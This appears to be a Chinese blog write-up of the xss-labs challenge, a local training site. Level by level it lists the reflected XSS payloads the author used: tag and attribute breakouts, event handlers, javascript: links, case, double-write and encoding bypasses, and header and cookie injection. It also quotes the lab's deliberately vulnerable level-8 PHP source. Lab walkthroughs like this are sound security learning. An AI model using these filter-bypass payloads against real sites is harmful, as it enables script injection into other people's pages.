文章目录
一:下载与部署
xss challenge是个有关反射型xss的测试通关挑战,一共有20关。
下载地址:xss challenge
(访问密码:donMkh)
下载之后解压,把得到的文件夹放在phpstudy的www文件夹下即可
二:通关过程
这个是我自己的通关方法,不一定很准确
首页
level-01 没有任何机制
点击首页图片进入第一关,发现修改name的值,页面的显示也随之改变,这里我们首先直接试试<script>alert(/xss/)<script>,发现直接alert弹窗,过关。
命令:http://10.157.14.169/xss-labs-master/level1.php ?name=<script>alert(/xss/)</script>
level-02 双引号闭合标签
先随便输入,发现跟着变化
然后试试<script>alert(/xss/)</script>,发现输入的内容会被直接显示在页面中,这说明这段JS代码没有起作用,只是当作纯字符给输出到页面了。
右键页面查看源码:
发现尖括号都被转义成<和>了,导致浏览器无法识别script标签。那我们要想让script生效。怎么办?
由上图可以看出,第一个红框的内容就是input标签内的value值,我们就可以在input标签上做文章,先把input标签用">给闭合掉。
所以http://10.157.14.169/xss-labs-master/level2.php ?keyword="><script>alert(/xss/)</script>
level-03 单引号闭合标签+html事件
进入第三关,发现keyword变成了writing了
我们点击搜索试试看,又变回keyword
我们就直接在hackbar里面修改为?keyword,然后试试?keyword=<script>alert(/xss/)</script>
发现没啥用。
右键打开页面源码,发现无论是h2标签的值,还是input的value值都被转义了,那是不是可以试试第二关的方法用'>闭合input标签呢,试了下发现没用,因为第二关的value值没有被转义。
那现在我们进入xss-labs-master(就是复制到www目录下的)文件夹,找到level3.php文件,打开看看。
发现有一个htmlspecialchars函数。百度一下这个函数。这里我截图下来了。
然后上述level3.php代码.htmlspecialchars($str).这说明,< >都变成了html实体,也就是说,只是一个纯粹的< 和 >字符。并且.htmlspecialchars($str).外部还有双引号包裹,说明还过滤了双引号。
这里我们就可以考虑用html事件,事件的使用可以参考上一节内容。
这里用onmouseover='alert(/xss/)',上面分析得到过滤了双引号,所以单引号
http://10.157.14.169/xss-labs-master/level3.php?keyword='onmouseover='alert(/xss/)'
level-04 双引号闭合标签+html事件
尝试<script>alert(/xss/)</script>发现不行,觉得应该用"><script>alert(/xss/)</script>
发现都被转义了,那我们和上一关一样,考虑事件,这次使用双引号。"onmouseover='alert(/xss/)'
level-05 伪协议
还是一样的,首先尝试<script>alert(/xss/)</script>
发现不行,右键打开网页源码。
发现script被强行改成scr_ipt,参考上一节内容,有点像xss的变形。
我们查看源代码level5.php
发现进行了变形处理。此处只是针对<script>和on,后者表示onmouseover事件也不能用了,因为on会被替换为o_n
这时候,我们可以考虑伪协议,发下a标签没有被使用。
所以"><a href="javascript:alert(/xss/)">click me</a>
level-06 xss变形,大小写绕过
尝试了<script>alert(/xss/)</script>,"><script>alert(/xss/)</script>,?keyword="onmouseover='alert(/xss/)'均被替换了,如下图
然后http://10.157.14.169/xss-labs-master/level6.php?keyword="<a href="javascript:alert(/xss/)">click me</a>
发现也不行
那么我们考虑XSS变形,比如替换大小写之类的。并且让input标签闭合
?keyword="><a hREf="javascript:alert(/xss/)">click me</a>
这里我们可以查看level6.php源码
发现只做了 分隔字符 的过滤。
level-07 双写绕过
上面的方法都试了,发下on,script,href,src会消失,查看了level07.php源码,发现果然如此:
然后又依次试过了制表符,空格,还有字母转十进制编码,以及十六进制编码,发现都不行。
然后又重新看了下上一节内容的笔记,结合源码中,会把整个关键字(比如script on src data href)给替换为空,那么就可以试试双写绕过。然后就用了如下代码:
<scr<script>ipt>alert(/xss/)</scr<script>ipt>
执行后,发现不成功,然后右键查看页面源码
发现多了一对尖括号,所以直接去掉尖括号,成功闯关
http://10.157.14.169/xss-labs-master/level7.php?keyword="><scrscriptipt>alert(/xss/)</scrscriptipt>
level-08 自己试了没有成功,后续再补充
没有解决,没看懂,网上也有大佬解出来了,但是我直接复制过来,我这边都弄不出来。不知道什么问题导致的?
这是level8.php源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level9.php?keyword=not bad!";
}
</script>
<title>欢迎来到level8</title>
</head>
<body>
<h1 align=center>欢迎来到level8</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
<center><img src=level8.jpg></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>
从上述源码中可以看出大小写,双引号,也过滤了,前面关,用过的也都不起作用。
看到有个a标签,我们可以考虑伪协议 + 字符编码。
先不编码:payload:javascript:alert(/xss/)
发现ri替换为r_i,
接下来考虑字符编码
这里有个字符实体转码的网站:点我
所以我们可以构造payload:?keyword=javascript:alert(/xss/)
页面代码:
我没成功,但是别人的可以,不知道为啥了?????????????
网上的成功图:
--------------可以先用取巧的方法跳过这一关,进入下一关-------------
补充:level08-20
8:
在输入框中输入,javascript:alert(1)的unicode的编码,编码网址:https://www.matools.com/app/unicode
javascript:alert(1)
9:
因为有个strpos函数,会获取字符中是否有http://
payload1:javascript:alert(1)/*http://*/
payload2:javascript:alert('xsshttp://')
10
把鼠标移动到输入框上
http://127.0.0.1/xss-labs-master/level10.php?t_sort=1" onmousemove="javascript:alert(1)" type="text"
11
F12查看,更改type的属性为text,t_ref输入框内输入123,然后回车,框内的值会变成http://127.0.0.1/xss-labs-master/level11.php?t_link=&t_history=&t_sort=&t_ref=123 得到的是浏览器的HTTP_REFERER
那么可以构造HTTP_REFERER的payload:利用hackbar工具,勾选Referer的选项,输入" onmouseover="javascript:alert()" type="text"
12
与11 类似,F12查看,更改type的属性为text,t_ua输入框内输入123,只不过把HTTP_REFERER替换成HTTP_USER_AGENT,与上同样的方法,利用hackbar工具,勾选User Agent的选项,
输入" onmousemove="javascript:alert()" type="text"
13
与12类似,可以直接查看源码,发现是对cookie相关的注入。所以打开浏览器F12选择存储,更改cookie的值," onmouseover="javascript:alert()" type="text",然后刷新页面即可
14
参考文章:
https://www.freebuf.com/articles/web/282983.html
15
http://127.0.0.1/xss-labs-master/level15.php?src='../../level1.php?name=<img src=1 onmouseover=alert()>'
16
可以先输入关键字测试一波看看那些被屏蔽了?keyword=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()> j
发现大写转小写了,script替换为空格了,F12可以看到空格变成实体字符 了,/也转空格了
空格可以用回车代替,回车的url编码为%0a,所以构造如下payload
http://127.0.0.1/xss-labs-master/level16.php?keyword=<img%0asrc='x'%0aonerror='alert(1)'>
17
查看17关的PHP源码,发现有个src=xsf01.swf,swf文件是以前的旧浏览器的flash文件,但是现在浏览器基本都不支持了,所以,把源码修改改为src=index.png,并不影响。
有个<embed>标签,这个标签定义了一个容器,用来嵌入外部的应用程序等。现在不建议使用,一般使用<img><iframe><video><audio>等标签代替。构造如下payload
http://127.0.0.1/xss-labs-master/level17.php?arg01=a&arg02=b onmouseover='alert(123);'
18
同上
http://127.0.0.1/xss-labs-master/level18.php?arg01=a&arg02=b onmouseover='alert(123);'
19
按照同上修改PHP文件,然后payload一下,发现并不能成功,因为在这一关的src=后面有个双引号,也就是说会把index.png?和你传入的值放在一起进行处理。又因为传入的值经过htmlspecialchars实体化处理,
所以无法闭合双引号。 先把index.png?恢复成原来的,然后参考大佬的文章:https://blog.csdn.net/u014029795/article/details/103213877
20
参考文章:
https://blog.csdn.net/u014029795/article/details/103217680
1324
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
